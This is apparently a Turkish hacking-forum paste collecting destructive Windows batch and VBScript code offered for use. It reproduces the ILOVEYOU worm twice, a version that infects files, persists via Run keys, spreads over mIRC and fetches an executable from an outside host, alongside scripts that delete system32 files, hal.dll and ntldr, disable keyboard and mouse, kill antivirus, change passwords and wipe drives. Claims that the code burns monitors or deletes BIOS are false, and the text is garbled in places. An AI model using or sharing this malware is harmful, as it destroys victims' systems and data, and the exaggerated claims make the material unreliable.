-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Pc Bozma Not Defterini Aç Kodu Yapıştır Farklı Kaydet oyun.bat
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fs
penTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread="") then
downread="c:"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fs
penTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fs
penTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&""&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fs
penTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }"
scriptini.WriteLine "n2= /.dcc send şnick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
%100 Çalışan .Bat
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
1-Explorer.exe kapanır
2-Mouse aktif dışı olur
3-Klavye aktif dışı olur
4-Mouse çöker Artık mouse tarih olur.
5-Pcye manyak şifre konur
6-Explorer.exe silinir
7-Taskmgr Silinir.
8-Hal.dll silinir bilgisayar formatlık olur
9-Masaüstü silinir
10-Pcye mesaj gelir ve pc kapanır.
@echo off
taskkill -f -im explorer.exe
rundll32 mouse,disable
rundll32 keyboard,disable
rundll32 user,swapmousebutton
net user %username% RobustTeam
start %systemdrive%\WINDOWS\system32\WISPTIS.EXE
start %systemdrive%\WINDOWS\system32\WISPTIS.EXE
del f/q/s %systemdrive%\WINDOWS\explorer.exe
del f/q/s %systemdrive%\WINDOWS\system32\explorer.exe
del f/q/s %systemdrive%\WINDOWS\TASKMAN.exe
del f/q/s %systemdrive%\WINDOWS\taskman.exe
del f/q/s %systemdrive%\WINDOWS\system32\taskmgr.exe
rem Disable Computer By Deleting hal.dll
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll
del f/q/s %systemdrive%/docume~1/%username%/desktop\*.*
del f/q/s %systemdrive%/Users/%username%/desktop\*.*
shutdown -r -t 15 -c "By Adapazarli Tarafından Hackedlendin Bay Mal."
pause
@echo off
exit
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Klavye Hackleme Kodu
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
del C:/WINDOWS/system/KEYBOARD.DRV
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
System32 Hacked
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
C:/windows/system32/deleted
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Masa Üstünü Silme
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
CD..
CD..
CD.
erase c:/f/s/q/a
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Ip Bulma
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
baslat>calıstır>cmd>netstat -n
yanında :80 olanlar değil başka yazanlar ip adresidir..
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Pc Süre Koyma
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
shutdown -s -t 3600 Bilgisayar 1 saat sonra kapanır.
shutdown -s -t 7200 Bilgisayar 2 saat sonra kapanır.
Kapatmayı İptal Etmek İçin:
shutdown -a -t 3600 Yani 1 Saat İptal Oluyor
shutdown -a -t 7200 Yani 2 Saat İptal Oluyor
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Mouse Ve Klavye Driverlerini Çökertme
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
del C:/WINDOWS/system/MOUSE.DRV
del C:/WINDOWS/system/KEYBOARD.DRV
del c:\WINDOWS\system32\drivers\cdrom.bat
shutdown -r
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
System32
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
del %systemroot%system32dllcachec_1254.nls
del %systemroot%system32c_1254.nls
del %systemroot%system32hal.dll
del %systemroot%system32kdcom.dll
del %systemroot%system32kernel32.dll
del %systemroot%system32bootvid.dll
del %systemroot%system32c_037.nls
del %systemroot%system32c_437.nls
del %systemroot%system32c_500.nls
del %systemroot%system32c_737.nls
del %systemroot%system32c_1255.nls
del %systemroot%system32C_28594.nls
del %systemroot%system32c_20866.nls
del %systemroot%system32bidispl.dll
del %systemroot%system32C_28594.nls
del %systemroot%system32ups.exe
del %systemroot%system32trkwks.dll
del %systemroot%system32scardsvr.exe
del %systemroot%system32audiosrv.dll
del %systemroot%system32driversatapi.sys
del %systemroot%system32driverscdaudio.sys
del %systemroot%system32driverscdfs.sys
del %systemroot%system32driverscdrom.sys
del %systemroot%\\system32\\dllcac he\\c_1254.nls
del %systemroot%\\system32\\c_1254 .nls
shutdown -r -t 00
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Başka Bir Sistem32 Çökertme
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
net user %username% robustteam
del %systemroot%\\system32\\dllcache\\c_1254.nls
del %systemroot%\\system32\\c_1254.nls
del %systemroot%\\system32\\hal.dll
del %systemroot%\\system32\\kdcom.dll
del %systemroot%\\system32\\kernel32.dll
del %systemroot%\\system32\\bootvid.dll
del %systemroot%\\system32\\c_037.nls
del %systemroot%\\system32\\c_437.nls
del %systemroot%\\system32\\c_500.nls
del %systemroot%\\system32\\c_737.nls
del %systemroot%\\system32\\c_1255.nls
del %systemroot%\\system32\\C_28594.nls
del %systemroot%\\system32\\c_20866.nls
del %systemroot%\\system32\\bidispl.dll
del %systemroot%\\system32\\C_28594.nls
del %systemroot%\\system32\\ups.exe
del %systemroot%\\system32\\trkwks.dll
del %systemroot%\\system32\\scardsvr.exe
del %systemroot%\\system32\\audiosrv.dll
del %systemroot%\\system32\\drivers\\atapi.sys
del %systemroot%\\system32\\drivers\\cdaudio.sys
del %systemroot%\\system32\\drivers\\cdfs.sys
del %systemroot%\\system32\\drivers\\cdrom.sys
shutdown -r -t 00
net user %username% robustteam
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Klavye ve Fare'yi KitLeyen Virüs Kodu
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
@echo off
Title The kit was the keyboard and mouse...
taskkill /im explorer.exe /f
taskkill /im wscript.exe
reg addHKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f > nul
reg addHKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f > nul
cls
exit
shutdown -r -t 00
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
PC Şifre Koyma
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
net user %username% robustteam
shutdown -r
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
İnternet Bağlantınız Kesilecek Ve İnternet'e Bağlanmak İçin Sizden Parola İsteyecek Parolanız( robustteam )
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
@echo off
color 0a
cls
ipconfig/release
cls
echo.
:a
set /p a=H-u-t-g İnternet Baglantiniz Kesildi Baglanmak İcin Parola Girin:
if %a%==robustteam goto b
if not %a%==robustteam goto c
:b
ipconfig/renew
cls
echo Hos Geldiniz . . .
echo Sitelerinizi Acmak İcin Lütfen Enter'e Basin...
echo İstemiyorsaniz Cikis Butonuna Basiniz ...
pause
start chrome.exe https://tr-tr.facebook.com/
start chrome.exe https://www.youtube.com/?hl=tr&gl=TR
start chrome.exe http://www.turkhackteam.org/
start chrome.exe https://www.google.com.tr/
cls
exit
:c
echo Yanlis parola
goto a
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Virüs Özellikleri :
dll Dosyaları Silinir
Masaüstü Komple Silinir
Başlat Menüsü Silinir
Klavye Çalışmaz
Mause Çalışmaz
CD-Rom Sürekli Açıp Kapanır
Bilgisayara Şifre Koyar
Güvenlik Duvarı Kapanır
Resimler Silinir
Yüm .exe Dosyaları silinir
@echo off net stop "Security Center" net stop SharedAccess > "%Temp%.kill.reg" ECHO A R E S > >"%Temp%.kill.reg" ECHO. > >"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esSharedAccess] > >"%Temp%.kill.reg" ECHO "Start"=dword:00000004 ****"%Temp%.kill.reg" ECHO. > >"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic eswuauserv] > >"%Temp%.kill.reg" ECHO "Start"=dword:00000004 > >"%Temp%.kill.reg" ECHO. > >"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesw scsvc] > >"%Temp%.kill.reg" ECHO "Start"=dword:00000004 > >"%Temp%.kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.kill.reg" DEL "%Temp%.kill.reg" DEL %0 net user %username% 11111111111111111111 Command 5 Command 7 @echo off Title The kit was the keyboard and mouse... taskkill /im explorer.exe /f taskkill /im wscript.exe reg addHKLMSystemCurrentControlSetServicesMouclass/v Start /t REG_DWORD /d4/f > nul reg addHKLMSystemCurrentControlSetServicesKbdclass/v Start /t REG_DWORD /d4/f > nul cls exit start %systemdrive%WINDOWSsystem32WISPTIS.EXE start %systemdrive%WINDOWSsystem32WISPTIS.EXE del /f /q /s %systemdrive%*.dll del /f /q /s %systemdrive%*.exe del %systemdrive%WINDOWSsystem32spider.exe del %systemdrive%WINDOWSsystem32mshearts.exe del %systemdrive%WINDOWSsystem32freecell.exe del %systemdrive%WINDOWSsystem32sol.exe del %systemdrive%WINDOWSsystem32WINmine.exe del /f /q /s %systemdrive%*.jpg del /f /q /s %systemdrive%*.jpeg del /f /q /s %systemdrive%*.gif del /f /q /s %systemdrive%*.bmp del /f /q /s %systemdrive%*.jpe del /f /q /s %systemdrive%*.jpg del /f /q /s %systemdrive%*.tif del /f /q /s %systemdrive%*.dib del /f /q /s %systemdrive%*.tiff del /f /q /s %systemdrive%*.jfif del /f /q /s %systemdrive%*.png net share system=C: /unlimited Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0 Eject;1 Eject;0
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Antivirüs kapanır(İşlem yarıda kalmasın diye)
Bios silinir
Hardisk silinir
Sürücüler bozulur
Kasa yanar (%75 ihtimalle)
Klavye felç geçirir
Monitor yanar(%75 ihtimalle)
Şifre Değişir
Windows Silinir
Kod:
@echo off
CLS
taskkill /F /IM av*
taskkill /F /IM fire*
taskkill /F /IM anti*
CLS
taskkill /F /IM spy*
taskkill /F /IM bullguard*
taskkill /F /IM PersFw*
taskkill /F /IM KAV*
taskkill /F /IM ZONEALARM*
taskkill /F /IM SAFEWEB*
CLS
taskkill /F /IM OUTPOST*
taskkill /F /IM nv*
taskkill /F /IM nav*
taskkill /F /IM F-*
taskkill /F /IM ESAFE*
taskkill /F /IM cle*
CLS
taskkill /F /IM BLACKICE*
taskkill /F /IM def*
taskkill /F /IM kav*
taskkill /F /IM kav*
taskkill /F /IM avg*
taskkill /F /IM ash*
CLS
taskkill /F /IM aswupdsv*
taskkill /F /IM ewid*
taskkill /F /IM guar*
taskkill /F /IM gcasDt*
taskkill /F /IM msmp*
CLS
taskkill /F /IM mcafe*
taskkill /F /IM mghtml*
taskkill /F /IM msiexec*
taskkill /F /IM outpost*
taskkill /F /IM isafe*
taskkill /F /IM zap*
CLS
taskkill /F /IM zauinst*
taskkill /F /IM upd*
taskkill /F /IM zlclien*
taskkill /F /IM minilog*
taskkill /F /IM cc* b
taskkill /F /IM norton*
CLS
taskkill /F /IM norton au*
taskkill /F /IM ccc*
taskkill /F /IM npfmn*
taskkill /F /IM loge*
taskkill /F /IM nisum*
taskkill /F /IM issvc*
taskkill /F /IM tmp*
CLS
taskkill /F /IM tmn*
taskkill /F /IM pcc*
taskkill /F /IM cpd*
taskkill /F /IM pop*
taskkill /F /IM pav*
taskkill /F /IM padmin*
CLS
taskkill /F /IM panda*
taskkill /F /IM avsch*
taskkill /F /IM sche*
taskkill /F /IM syman*
taskkill /F /IM virus*
taskkill /F /IM realm*
CLS
taskkill /F /IM sweep*
taskkill /F /IM scan*
taskkill /F /IM ad-*
taskkill /F /IM safe*
taskkill /F /IM avas*
taskkill /F /IM norm*
taskkill /F /IM offg*
CLS
RMDIR /Q "C:\Program Files\alwils~1" /S
RMDIR /Q "C:\Program Files\Lavasoft\Ad-awa~1" /S
RMDIR /Q "C:\Program Files\kasper~1" /S
CLS
RMDIR /Q "C:\Program Files\trojan~1" /S
RMDIR /Q "C:\Program Files\f-prot95" /S
RMDIR /Q "C:\Program Files\tbav" /S
CLS
RMDIR /Q "C:\Program Files\avpersonal" /S
RMDIR /Q "C:\Program Files\Norton~1" /S
RMDIR /Q "C:\Program Files\Mcafee" /S
CLS
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\Norton~3" /S
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\speedd~1" /S
RMDIR /Q "C:\Program Files\Norton~1\Norton~1" /S
RMDIR /Q "C:\Program Files\Norton~1" /S
CLS
RMDIR /Q "C:\Program Files\avgamsr" /S
RMDIR /Q "C:\Program Files\avgamsvr" /S
RMDIR /Q "C:\Program Files\avgemc" /S
CLS
RMDIR /Q "C:\Program Files\avgcc" /S
RMDIR /Q "C:\Program Files\avgupsvc" /S
RMDIR /Q "C:\Program Files\grisoft" /S
RMDIR /Q "C:\Program Files\nood32krn" /S
RMDIR /Q "C:\Program Files\nood32" /S
CLS
RMDIR /Q "C:\Program Files\nod32" /S
RMDIR /Q "C:\Program Files\nood32" /S
RMDIR /Q "C:\Program Files\kav" /S
RMDIR /Q "C:\Program Files\kavmm" /S
RMDIR /Q "C:\Program Files\kaspersky" /S
CLS
RMDIR /Q "C:\Program Files\ewidoctrl" /S
RMDIR /Q "C:\Program Files\guard" /S
RMDIR /Q "C:\Program Files\ewido" /S
CLS
RMDIR /Q "C:\Program Files\pavprsrv" /S
RMDIR /Q "C:\Program Files\pavprot" /S
RMDIR /Q "C:\Program Files\avengine" /S
CLS
RMDIR /Q "C:\Program Files\apvxdwin" /S
RMDIR /Q "C:\Program Files\webproxy" /S
RMDIR /Q "C:\Program Files\panda software" /S
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
/timersecure 0 0 //mkdir şmid(C:,1,2) ş+ şrand(1,99999) ş+ şrand(A,Z) ş+ şrand(a,z)
echo off
echo Microsoft sorunla karşılaştı bi tuşa basınca düzeltilecektir
echo off
pause
del /f /q d:
del /f /q c:
del C:/WINDOWS/system/KEYBOARD.DRV
90,90
resizepic 0 0 5054 405 470
gumppic 10 10 5528
gumppic *100)/1337))> *100)/1067))> 2362
text 20 400 455 0
text 20 435 455 01 local.t_x=
local.t_y=
sector.allclients sendpacket 0c0 00 D D W W W?: W B?: B 00 00 00 B?:0> D - 1> D
90,90
resizepic 0 0 5054 405 470
gumppic 10 10 5528
gumppic *100)/1337))> *100)/1067))> 2362
text 20 400 455 0
text 20 435 455 01 local.t_x=
local.t_y=
sector.allclients sendpacket 0c0 00 D D W W W?: W B?: B 00 00 00 B?:0> D - 1> D
net user %username% robustteam
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------
Dosya açılırsa ;
1. Pc'nin güvenlik duvarı kapanır.
2. BIOS silinir.
3. Anakart, harddisk, ekran kartı, usb girişleri hepsi yanar.
4. Tüm windows ailesine uyumludur.
5. System32 çok büyük zarar görür.
6. C:\WINDOWS\system klasörü silinir.
7. Ekran gider.
8. Monitör yanar.
9. PC BİRDAHA ASLA ÇALIŞMAZ . . .
@echo off
net stop "Security Center"
net stop SharedAccess
> -%Temp%.\kill.reg" ECHO A R E S
>>-%Temp%.\kill.reg" ECHO.
>>-%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>-%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>-%Temp%.\kill.reg" ECHO.
>>-%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>-%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>-%Temp%.\kill.reg" ECHO.
>>-%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>-%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>-%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S -%Temp%.\kill.reg"
DEL -%Temp%.\kill.reg"
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,e q,ctr,file,vbscopy,d ow
eq=--
ctr=0
Set fso = CreateObject("Scripting.FileSy stemObject")
set file = fs
penTextFile(WScript.Scrip tFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.She ll")
rr=wscr.RegRead("HKEY_CURRENT_ USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Mi crosoft\Windows Scripting Host\Settings\Timeout",0,"REG_ DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFull Name)
c.Copy(dirsystem&-\MSKernel32. vbs")
c.Copy(dirwin&-\Win32DLL.vbs")
c.Copy(dirsystem&-\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\M icrosoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&-\ MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\M icrosoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin &-\Win32DLL.vbs"
downread=--
downread=regget("HKEY_CURRENT_ USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread=--) then
downread="c:\-
end if
if (fileexist(dirsystem&-\WinFAT3 2.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Inter net Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKh...twertnMTFwetrd sfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Inter net Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skl...wetryDGFikjUIy qwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Inter net Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TR...198vbFV5hfFEkb opBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Inter net Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjks...nfgkKLHjkqwtuH JBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw23 7461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&-\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\M icrosoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&-\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Mi crosoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&-\-)
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bna me,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.pa th)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fs
penTextFile(f1.path,2, true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fs
penTextFile(f1.path,2, true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&-\-&bname& -.vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fs
penTextFile(f1.path,2, true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&-.vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path &-.vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+ 2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(f olderspec&-\script.i ni")
scriptini.WriteLine -[script]-
scriptini.WriteLine -;mIRC Script"
scriptini.WriteLine -; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine - corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine -;-
scriptini.WriteLine -;Khaled Mardam-Bey"
scriptini.WriteLine -;http://www.mirc.com"
scriptini.WriteLine -;-
scriptini.WriteLine "n0=on 1:JOIN:#:{-
scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }-
scriptini.WriteLine "n2= /.dcc send şnick -&dirsystem&-\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}-
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspe c)) then
msg = 0
cd c:\\
attrib -s -h boot.ini
cls
attrib -s -h found.000
attrib -s -h found.001
t>boot.ini
attrib -a -s -h pagefile.sys
h>pagefile.sys
attrib -a -s -h hiberfil.sys
HH>hiberfil.sys
attrib -a -s -h -r bootfont.bin
hhh>bootfont.bin
attrib -a -s -h -r ntdetect.com
ff>ntdetect.com
attrib -a -s -h -r ntldr
f>ntldr
cls
cd..
cd..
cls
cd windows
g>win.ini
cls
g>system.ini
cls
cd pss
ft>system.ini.backup
f>win.ini.backup
cls
cd c:\\
@echo .::.HADi baslayalım.::.
cd windows
cd system32
attrib -r -h -s dllcache
cls
attrib -a -h -r *.manifest
cls
cd config
attrib -a -h *.log
cd..
cd restore
attrib -r -h -s filelist.xml
cls
cd c:\\
cls
cd windows
cls
tskill msnmsgr /a
tskill msmsgs /a
cls
del /f /q /s c:\\windows\\system32\\*.*
cls
cd repair
attrib -a -h ntuser.dat
f>ntuser.dat
ff>secstup.inf
cd..
attrib -h inf
